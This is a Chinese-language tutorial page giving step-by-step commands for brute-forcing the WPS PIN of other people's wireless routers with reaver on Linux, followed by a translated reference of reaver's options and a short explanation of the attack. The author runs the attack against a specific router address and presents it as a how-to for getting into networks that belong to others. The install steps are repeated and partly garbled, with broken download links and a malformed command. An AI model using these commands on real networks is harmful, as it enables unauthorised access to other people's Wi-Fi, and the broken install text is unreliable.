在linux下使用reaver破解无线wifi密码的步骤
在linux下使用reaver破解无线wifi密码的步骤
发布时间:2016-01-30 来源:查字典编辑
摘要:需要工具:reaver原理:穷举PIN码以攻破无线路由器的安全防护安装: 下载源码从这个网址下载reaver源代码/p/reaver-wps...

需要工具:reaver

原理:穷举PIN码以攻破无线路由器的安全防护

安装:

 下载源码

从这个网址下载reaver源代码/p/reaver-wps

wget reaver-/files/reaver-1.4.tar.gz

 

 

解压

tar-xzvf reaver-1.4.tar.gz

 

安装必要的软件依赖库和工具

在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng

sudo  apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

 

编译和安装

 

配置和编译Reaver

 

cd  reaver-1.4

cd  src

./configure

make

下载aircrack-ng源代码并编译

从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure

make

sudo install

解压 tar -xzvf reaver-1.4.tar.gz

 

安装必要的软件依赖库和工具

在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

编译和安装

配置和编译 Reaver

cd reaver-1.4 cd src ./configure make

安装 Reaver

sudo make install

方法:

1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)

2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.

3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.

注:如果你已知对方无线路由信息 第2,第3步 可省略!

4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。

实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!

reaver 参数详解

必须参数

-i, –interface= Name of the monitor-mode interface to use

网卡的监视接口,通常是mon0

-b, –bssid= BSSID of the target AP

AP的MAC地址

Optional Arguments: 可选参数

-m, –mac= MAC of the host system

指定本机MAC地址

-e, –essid= ESSID of the target AP

路由器的ESSID,一般不用指定

-c, –channel= Set the 802.11 channel for the interface (implies -f)

信号的频道,如果不指定会自动扫描

-o, –out-file= Send output to a log file [stdout]

输出日志文件

-s, –session= Restore a previous session file

恢复进度文件

-C, –exec= Execute the supplied command upon successful pin recovery

pin成功后执行命令

-D, –daemonize Daemonize reaver

设置reaver成Daemon

-a, –auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数

-f, –fixed Disable channel hopping

禁止频道跳转

-5, –5ghz Use 5GHz 802.11 channels

使用5G频道

-v, –verbose Display non-critical warnings (-vv for more)

显示不重要警告信息 -vv 可以显示更多

-q, –quiet Only display critical messages

只显示关键信息

-h, –help Show help

显示帮助

Advanced Options:高级选项

-p, –pin= Use the specified 4 or 8 digit WPS pin

使用指定的4位或者8位pin码

-d, –delay= Set the delay between pin attempts [1]

pin间延时,默认1秒

-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]

AP锁定WPS后等待时间

-g, –max-attempts= Quit after num pin attempts

最大pin次数

Reaver 参数

—天天

-x, –fail-wait= Set the time to sleep after 10 unexpected failures [0]

10次意外失败后等待时间,默认0秒

-r, –recurring-delay= Sleep for y seconds every x pin attempts

每x次pin后等待y秒

-t, –timeout= Set the receive timeout period [5]

收包超时,默认5秒

-T, –m57-timeout= Set the M5/M7 timeout period [0.20]

M5/M7超时,默认0.2秒

-A, –no-associate Do not associate with the AP (association must be done by another application)

 

不连入AP(连入过程必须有其他程序完成)

-N, –no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息(如果一直pin不动,可以尝试这个参数)

-S, –dh-small Use small DH keys to improve crack speed

使用小DH关键值提高速度(推荐使用)

-L, –ignore-locks Ignore locked state reported by the target AP

忽略目标AP报告的锁定状态

-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet

每当收到EAP失败包就终止WPS进程

-n, –nack Target AP always sends a NACK [Auto]

对目标AP总是发送NACK,默认自动

-w, –win7 Mimic a Windows 7 registrar [False]

模拟win7注册,默认关闭

Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。

原理详细:

什么是PIN码?

印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。

PIN码有什么用?

在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。

穷举PIN码是什么意思?

既然知道了无线路由器PIN值的范围(8位纯数字),且目前大部分设备的WPS是呈开启状态的,那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类